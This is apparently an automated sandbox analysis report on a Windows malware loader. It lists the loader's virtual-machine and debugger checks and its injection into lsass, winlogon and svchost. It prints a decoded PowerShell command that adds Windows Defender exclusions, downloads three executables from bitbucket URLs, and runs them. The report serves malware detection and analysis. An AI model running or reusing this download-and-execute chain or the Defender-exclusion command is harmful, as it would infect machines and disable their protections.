oLowerManagementObjectEnumeratorGetEnumerator.ctor.cctordotNetProtectorIntPtrSystem.DiagnosticsSystem.Runtime.CompilerServicesContainsGetCurrentProcessset_ArgumentsManagementBaseObjectGetop_ExplicitExitToUpperInvariantSystem.ManagementEnvironmentget_CurrentIsModulePresentCheckRemoteDebuggerPresentIsDebuggerPresentget_TickCountStartConvertMoveNextSystem.Textset_CreateNoWindowCheckForVMwareAndVirtualBoxdmjzxop_Equalityop_InequalityESelect * from Win32_ComputerSystem
                        Source: svchost.exe, 00000035.00000000.2297078138.000001D559386000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VMwareVirtual disk6000c2942fce4d06663969f532e45d1a8
                        Source: dwm.exe, 0000002E.00000000.2237368637.000002BAAA00C000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\4&224F42EF&0&000000S
                        Source: GGLoader.exe, 00000000.00000002.1714729669.00000000034D1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: vmware@E
                        Source: svchost.exe, 00000035.00000000.2297078138.000001D5593A4000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VMwareVirtual disk2.06000c2942fce4d06663969f532e45d1aPCI Slot 32 : Bus 2 : Device 0 : Function 0 : Adapter 0 : Port 0 : Target 0 : LUN 0PCI\VEN_1000&DEV_0054&SUBSYS_197615AD&REV_01\3&218e0f40&0&00
                        Source: svchost.exe, 00000035.00000003.2354475189.000001D5592A3000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: storahciNECVMWarVMware SATA CD00
                        Source: lsass.exe, 0000002C.00000002.2961113290.00000202BFC13000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000002C.00000000.2223603284.00000202BFC13000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000002D.00000002.2956835957.000002A660613000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000002D.00000000.2231046863.000002A660613000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000030.00000000.2273754697.000001795302B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000030.00000002.2954077537.000001795302B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000031.00000000.2274757893.000002295CE2A000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000031.00000002.2954277150.000002295CE2A000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000033.00000002.2962965792.000001845AC3F000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000033.00000000.2277933173.000001845AC3F000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000035.00000002.2964974668.000001D55862B000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                        Source: lsass.exe, 0000002C.00000002.2963978319.00000202BFC89000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: pvmicshutdownNT SERVICE
                        Source: powershell.exe, 00000011.00000002.2039902997.00000270B78B8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Add-NetEventVmNetworkAdapter
                        Source: lsass.exe, 0000002C.00000002.2972274642.00000202C037F000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: NXTVMWare
                        Source: svchost.exe, 00000035.00000000.2301742572.000001D559C12000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: $value = $pr.Value.replace("VBOX", $value).replace("VBox", $value).replace("VMWARE", $value).replace("VMware", $value).replace("VirtualBox", $value).replace("Oracle Corporation", $value).replace("Microsoft Basic Display Adapter", $value)
                        Source: svchost.exe, 00000035.00000003.2354475189.000001D5592A3000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: nonicVMware Virtual disk 6000c2942fce4d06663969f532e45d1a
                        Source: svchost.exe, 00000035.00000000.2294844228.000001D558643000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: (@vmcitpA
                        Source: svchost.exe, 0000002D.00000002.2959155286.000002A66066B000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: @SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000
                        Source: svchost.exe, 00000031.00000002.2952925182.000002295CE00000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: HvHostWdiSystemHostScDeviceEnumWiaRpctrkwksAudioEndpointBuilderhidservdot3svcUmRdpServiceDsSvcfhsvcvmickvpexchangevmicshutdownvmicguestinterfacevmicvmsessionsvsvcStorSvcWwanSvcvmicvssDevQueryBrokerNgcSvcsysmainNetmanTabletInputServicePcaSvcDisplayEnhancementServiceIPxlatCfgSvcDeviceAssociationServiceNcbServiceEmbeddedModeSensorServicewlansvcCscServiceWPDBusEnumMixedRealityOpenXRSvc
                        Source: lsass.exe, 0000002C.00000002.2963978319.00000202BFC89000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: pvmicheartbeatNT SERVICE
                        Source: svchost.exe, 00000035.00000000.2301742572.000001D559C12000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: if(($pr.Name -eq "DeviceId" -or $pr.Name -eq "Caption" -or $pr.Name -eq "Model" -or $pr.Name -eq "PNPDeviceID") -and ($pr.Value -match 'VBOX' -or $pr.Value -match 'VBox' -or $pr.Value -match 'VMWARE' -or $pr.Value -match 'VMware'))
                        Source: dwm.exe, 0000002E.00000000.2237368637.000002BAAA00C000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000
                        Source: C:\Windows\System32\dllhost.exeAPI call chain: ExitProcess graph end node
                        Source: C:\Windows\System32\dllhost.exeAPI call chain: ExitProcess graph end node
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior

                        Anti Debugging

                        barindex
                        Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)
                        Source: C:\Users\user\Desktop\GGLoader.exeCode function: 0_2_00007FFD9B885D4D CheckRemoteDebuggerPresent,0_2_00007FFD9B885D4D
                        Source: C:\Users\user\Desktop\GGLoader.exeProcess queried: DebugPortJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\LicCheck.exeCode function: 6_2_00793F90 IsDebuggerPresent,GetModuleHandleW,GetProcAddress,GetTickCount64,NtDelayExecution,GetTickCount64,6_2_00793F90
                        Source: C:\Users\user\AppData\Local\Temp\LicCheck.exeCode function: 6_2_007BB2BB mov eax, dword ptr fs:[00000030h]6_2_007BB2BB
                        Source: C:\Users\user\AppData\Local\Temp\LicCheck.exeCode function: 6_2_007AFF51 mov ecx, dword ptr fs:[00000030h]6_2_007AFF51
                        Source: C:\Users\user\AppData\Roaming\Win32Sync\svcupdater.exeCode function: 35_2_00C0B2BB mov eax, dword ptr fs:[00000030h]35_2_00C0B2BB
                        Source: C:\Users\user\AppData\Roaming\Win32Sync\svcupdater.exeCode function: 35_2_00BFFF51 mov ecx, dword ptr fs:[00000030h]35_2_00BFFF51
                        Source: C:\Users\user\AppData\Local\Temp\LicCheck.exeCode function: 6_2_007BDA5F GetProcessHeap,6_2_007BDA5F
                        Source: C:\Users\user\Desktop\GGLoader.exeProcess token adjusted: DebugJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                        Source: C:\Windows\System32\dllhost.exeProcess token adjusted: Debug
                        Source: C:\Users\user\AppData\Local\Temp\LicCheck.exeCode function: 6_2_007A5B6A IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,6_2_007A5B6A
                        Source: C:\Users\user\AppData\Local\Temp\LicCheck.exeCode function: 6_2_007A9BF3 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,6_2_007A9BF3
                        Source: C:\Users\user\AppData\Local\Temp\LicCheck.exeCode function: 6_2_007A5CCC SetUnhandledExceptionFilter,6_2_007A5CCC
                        Source: C:\Users\user\AppData\Local\Temp\LicCheck.exeCode function: 6_2_007A5DD5 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,6_2_007A5DD5
                        Source: C:\Users\user\AppData\Roaming\Win32Sync\svcupdater.exeCode function: 35_2_00BF9BF3 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,35_2_00BF9BF3
                        Source: C:\Users\user\AppData\Roaming\Win32Sync\svcupdater.exeCode function: 35_2_00BF5B6A IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,35_2_00BF5B6A
                        Source: C:\Users\user\AppData\Roaming\Win32Sync\svcupdater.exeCode function: 35_2_00BF5CCC SetUnhandledExceptionFilter,35_2_00BF5CCC
                        Source: C:\Users\user\AppData\Roaming\Win32Sync\svcupdater.exeCode function: 35_2_00BF5DD5 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,35_2_00BF5DD5
                        Source: C:\Windows\System32\conhost.exeCode function: 39_2_000002505E597E70 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,39_2_000002505E597E70
                        Source: C:\Windows\System32\conhost.exeCode function: 39_2_000002505E59B50C RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,39_2_000002505E59B50C
                        Source: C:\Windows\System32\conhost.exeCode function: 41_2_000001C08C1B7E70 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,41_2_000001C08C1B7E70
                        Source: C:\Windows\System32\conhost.exeCode function: 41_2_000001C08C1BB50C RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,41_2_000001C08C1BB50C
                        Source: C:\Windows\System32\dllhost.exeCode function: 42_2_000002131118B50C RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,42_2_000002131118B50C
                        Source: C:\Windows\System32\dllhost.exeCode function: 42_2_0000021311187E70 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,42_2_0000021311187E70
                        Source: C:\Windows\System32\winlogon.exeCode function: 43_2_00000225DC647E70 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,43_2_00000225DC647E70
                        Source: C:\Windows\System32\winlogon.exeCode function: 43_2_00000225DC64B50C RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,43_2_00000225DC64B50C
                        Source: C:\Users\user\Desktop\GGLoader.exeMemory allocated: page read and write | page guardJump to behavior

                        HIPS / PFW / Operating System Protection Evasion

                        barindex
                        Yara detected Powershell download and execute
                        Source: Yara matchFile source: amsi64_7520.amsi.csv, type: OTHER
                        Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 7520, type: MEMORYSTR
                        Adds a directory exclusion to Windows Defender
                        Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
                        Source: C:\Users\user\AppData\Local\Temp\LicSend.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -ForceJump to behavior
                        Contains functionality to inject code into remote processes
                        Source: C:\Windows\System32\dllhost.exeCode function: 42_2_0000000140001DB4 CreateProcessW,VirtualAllocEx,WriteProcessMemory,WriteProcessMemory,VirtualAlloc,GetThreadContext,WriteProcessMemory,SetThreadContext,ResumeThread,OpenProcess,TerminateProcess,42_2_0000000140001DB4
                        Creates a thread in another existing process (thread injection)
                        Source: C:\Windows\System32\dllhost.exeThread created: C:\Windows\System32\winlogon.exe EIP: DC612908
                        Source: C:\Windows\System32\dllhost.exeThread created: C:\Windows\System32\lsass.exe EIP: C0AB2908
                        Source: C:\Windows\System32\dllhost.exeThread created: C:\Windows\System32\svchost.exe EIP: 612D2908
                        Source: C:\Windows\System32\dllhost.exeThread created: C:\Windows\System32\dwm.exe EIP: AED92908
                        Source: C:\Windows\System32\dllhost.exeThread created: C:\Windows\System32\svchost.exe EIP: 87992908
                        Source: C:\Windows\System32\dllhost.exeThread created: C:\Windows\System32\svchost.exe EIP: 53772908
                        Source: C:\Windows\System32\dllhost.exeThread created: C:\Windows\System32\svchost.exe EIP: 5D532908
                        Source: C:\Windows\System32\dllhost.exeThread created: C:\Windows\System32\svchost.exe EIP: 67D2908
                        Source: C:\Windows\System32\dllhost.exeThread created: C:\Windows\System32\svchost.exe EIP: 5B392908
                        Source: C:\Windows\System32\dllhost.exeThread created: C:\Windows\System32\svchost.exe EIP: EBFD2908
                        Source: C:\Windows\System32\dllhost.exeThread created: C:\Windows\System32\svchost.exe EIP: 59042908
                        Source: C:\Windows\System32\dllhost.exeThread created: C:\Windows\System32\svchost.exe EIP: A9E72908
                        Source: C:\Windows\System32\dllhost.exeThread created: C:\Windows\System32\svchost.exe EIP: 73162908
                        Source: C:\Windows\System32\dllhost.exeThread created: C:\Windows\System32\svchost.exe EIP: 4E862908
                        Source: C:\Windows\System32\dllhost.exeThread created: C:\Windows\System32\svchost.exe EIP: 473C2908
                        Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 6F9D2908
                        Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 83BC2908
                        Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: D3F72908
                        Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: A4152908
                        Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: BDF32908
                        Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: C0262908
                        Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: C9F32908
                        Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 645B2908
                        Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 7B2C2908
                        Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 4F62908
                        Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 2AB42908
                        Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 4ADB2908
                        Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 1992908
                        Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 25DA2908
                        Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: F5352908
                        Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: F0D62908
                        Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: FFB2908
                        Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: C2572908
                        Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 8BA22908
                        Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 66902908
                        Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 13FF2908
                        Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 8D572908
                        Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 69B42908
                        Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: CC742908
                        Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 5DA72908
                        Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 199D2908
                        Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: F3892908
                        Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 3B82908
                        Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 40E42908
                        Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: A6532908
                        Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 27BC2908
                        Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 7B152908
                        Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 621A2908
                        Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 2F482908
                        Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 8B4B2908
                        Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 683D2908
                        Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 87C2908
                        Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 2E262908
                        Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 6C5E2908
                        Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: D5932908
                        Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: FC652908
                        Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 777C2908
                        Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 33B42908
                        Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 8D0A2908
                        Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: AB4C2908
                        Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 2A642908
                        Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 6CF32908
                        Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 49352908
                        Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 60DA2908
                        Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 5E7B2908
                        Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 2F7C2908
                        Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: E8152908
                        Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 52342908
                        Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 9DA92908
                        Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 602E2908
                        Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: ABF92908
                        Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: D652908
                        Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: D1162908
                        Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: A6A82908
                        Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 13CB2908
                        Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: B1812908
                        Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: F5FC2908
                        Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 5E562908
                        Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 8C182908
                        Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 14E2908
                        Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 1512908
                        Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: FC572908
                        Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: E7AB2908
                        Encrypted powershell cmdline option found
                        Source: C:\Users\user\Desktop\GGLoader.exeProcess created: Base64 decoded <#grx#>Start-Process powershell -WindowStyle Hidden -ArgumentList "Add-Type -AssemblyName System.Windows.Forms;<#nus#>[System.Windows.Forms.MessageBox]::Show('No Virtual Machine/Server is allowed! Try running on a different device!','','OK','Error')<#wkk#>;";<#efr#> Add-MpPreference <#fpg#> -ExclusionPath @($env:UserProfile,$env:SystemDrive) <#nzh#> -Force <#aqd#>;(New-Object System.Net.WebClient).DownloadFile('https://bitbucket.org/5940jg9834/gf3443f3/raw/0adfaef4f847a17ea4e4f656dcd85e76293780ed/D.exe', <#pjx#> (Join-Path <#vcy#> -Path $env:Temp <#ycy#> -ChildPath 'LicenseGet.exe'))<#bgk#>; (New-Object System.Net.WebClient).DownloadFile('https://bitbucket.org/recheatsorg/recheatsdirect/raw/00eb2d0b436591fce1153baca762509e762f2ce4/CLP.exe', <#sbd#> (Join-Path <#hqu#> -Path $env:Temp <#kws#> -ChildPath 'LicCheck.exe'))<#kix#>; (New-Object System.Net.WebClient).DownloadFile('https://bitbucket.org/recheatsorg/recheatsdirect/raw/00eb2d0b436591fce1153baca762509e762f2ce4/Devmin.exe', <#duq#> (Join-Path <#hht#> -Path $env:Temp <#usr#> -ChildPath 'LicSend.exe'))<#hwn#>; Start-Process -FilePath <#cmj#> (Join-Path -Path $env:Temp <#guj#> -ChildPath 'LicenseGet.exe')<#tab#>; Start-Process -FilePath <#iun#> (Join-Path -Path $env:Temp <#vie#> -ChildPath 'LicCheck.exe')<#njw#>; Start-Process -FilePath <#ixi#> (Join-Path -Path $env:Temp <#tml#> -ChildPath 'LicSend.exe')<#dng#>
                        Source: C:\Users\user\Desktop\GGLoader.exeProcess created: Base64 decoded <#grx#>Start-Process powershell -WindowStyle Hidden -ArgumentList "Add-Type -AssemblyName System.Windows.Forms;<#nus#>[System.Windows.Forms.MessageBox]::Show('No Virtual Machine/Server is allowed! Try running on a different device!','','OK','Error')<#wkk#>;";<#efr#> Add-MpPreference <#fpg#> -ExclusionPath @($env:UserProfile,$env:SystemDrive) <#nzh#> -Force <#aqd#>;(New-Object System.Net.WebClient).DownloadFile('https://bitbucket.org/5940jg9834/gf3443f3/raw/0adfaef4f847a17ea4e4f656dcd85e76293780ed/D.exe', <#pjx#> (Join-Path <#vcy#> -Path $env:Temp <#ycy#> -ChildPath 'LicenseGet.exe'))<#bgk#>; (New-Object System.Net.WebClient).DownloadFile('https://bitbucket.org/recheatsorg/recheatsdirect/raw/00eb2d0b436591fce1153baca762509e762f2ce4/CLP.exe', <#sbd#> (Join-Path <#hqu#> -Path $env:Temp <#kws#> -ChildPath 'LicCheck.exe'))<#kix#>; (New-Object System.Net.WebClient).DownloadFile('https://bitbucket.org/recheatsorg/recheatsdirect/raw/00eb2d0b436591fce1153baca762509e762f2ce4/Devmin.exe', <#duq#> (Join-Path <#hht#> -Path $env:Temp <#usr#> -ChildPath 'LicSend.exe'))<#hwn#>; Start-Process -FilePath <#cmj#> (Join-Path -Path $env:Temp <#guj#> -ChildPath 'LicenseGet.exe')<#tab#>; Start-Process -FilePath <#iun#> (Join-Path -Path $env:Temp <#vie#> -ChildPath 'LicCheck.exe')<#njw#>; Start-Process -FilePath <#ixi#> (Join-Path -Path $env:Temp <#tml#> -ChildPath 'LicSend.exe')<#dng#>Jump to behavior
                        Found direct / indirect Syscall (likely to bypass EDR)
                        Source: C:\Users\user\AppData\Local\Temp\LicSend.exeNtQuerySystemInformation: Direct from: 0x7FF7D3B994FEJump to behavior
                        Injects a PE file into a foreign processes
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\dllhost.exe base: 140000000 value starts with: 4D5A
                        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\winlogon.exe base: 225DC610000 value starts with: 4D5A
                        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\lsass.exe base: 202C0AB0000 value starts with: 4D5A
                        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 2A6612D0000 value starts with: 4D5A
                        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\dwm.exe base: 2BAAED90000 value starts with: 4D5A
                        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 26A87990000 value starts with: 4D5A
                        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 17953770000 value starts with: 4D5A
                        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 2295D530000 value starts with: 4D5A
                        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 253067D0000 value starts with: 4D5A
                        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1845B390000 value starts with: 4D5A
                        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1ADEBFD0000 value starts with: 4D5A
                        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1D559040000 value starts with: 4D5A
                        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 241A9E70000 value starts with: 4D5A
                        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1CD73160000 value starts with: 4D5A
                        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 2824E860000 value starts with: 4D5A
                        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 21B473C0000 value starts with: 4D5A
                        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 2086F9D0000 value starts with: 4D5A
                        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 17183BC0000 value starts with: 4D5A
                        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 23FD3F70000 value starts with: 4D5A
                        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1D2A4150000 value starts with: 4D5A
                        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 275BDF30000 value starts with: 4D5A
                        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1AAC0260000 value starts with: 4D5A
                        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 203C9F30000 value starts with: 4D5A
                        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1B5645B0000 value starts with: 4D5A
                        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1BB7B2C0000 value starts with: 4D5A
                        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1C004F60000 value starts with: 4D5A
                        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 24E2AB40000 value starts with: 4D5A
                        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 2644ADB0000 value starts with: 4D5A
                        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\spoolsv.exe base: 1990000 value starts with: 4D5A
                        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 20D25DA0000 value starts with: 4D5A
                        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 26EF5350000 value starts with: 4D5A
                        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 2A7F0D60000 value starts with: 4D5A
                        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 23D0FFB0000 value starts with: 4D5A
                        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1B1C2570000 value starts with: 4D5A
                        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 2108BA20000 value starts with: 4D5A
                        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 29166900000 value starts with: 4D5A
                        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exe base: 21C13FF0000 value starts with: 4D5A
                        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1988D570000 value starts with: 4D5A
                        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 13869B40000 value starts with: 4D5A
                        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1E1CC740000 value starts with: 4D5A
                        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 2855DA70000 value starts with: 4D5A
                        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 2BF199D0000 value starts with: 4D5A
                        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 15AF3890000 value starts with: 4D5A
                        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 21A03B80000 value starts with: 4D5A
                        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\sihost.exe base: 1CD40E40000 value starts with: 4D5A
                        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 151A6530000 value starts with: 4D5A
                        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 19E27BC0000 value starts with: 4D5A
                        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 17D7B150000 value starts with: 4D5A
                        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1BE621A0000 value starts with: 4D5A
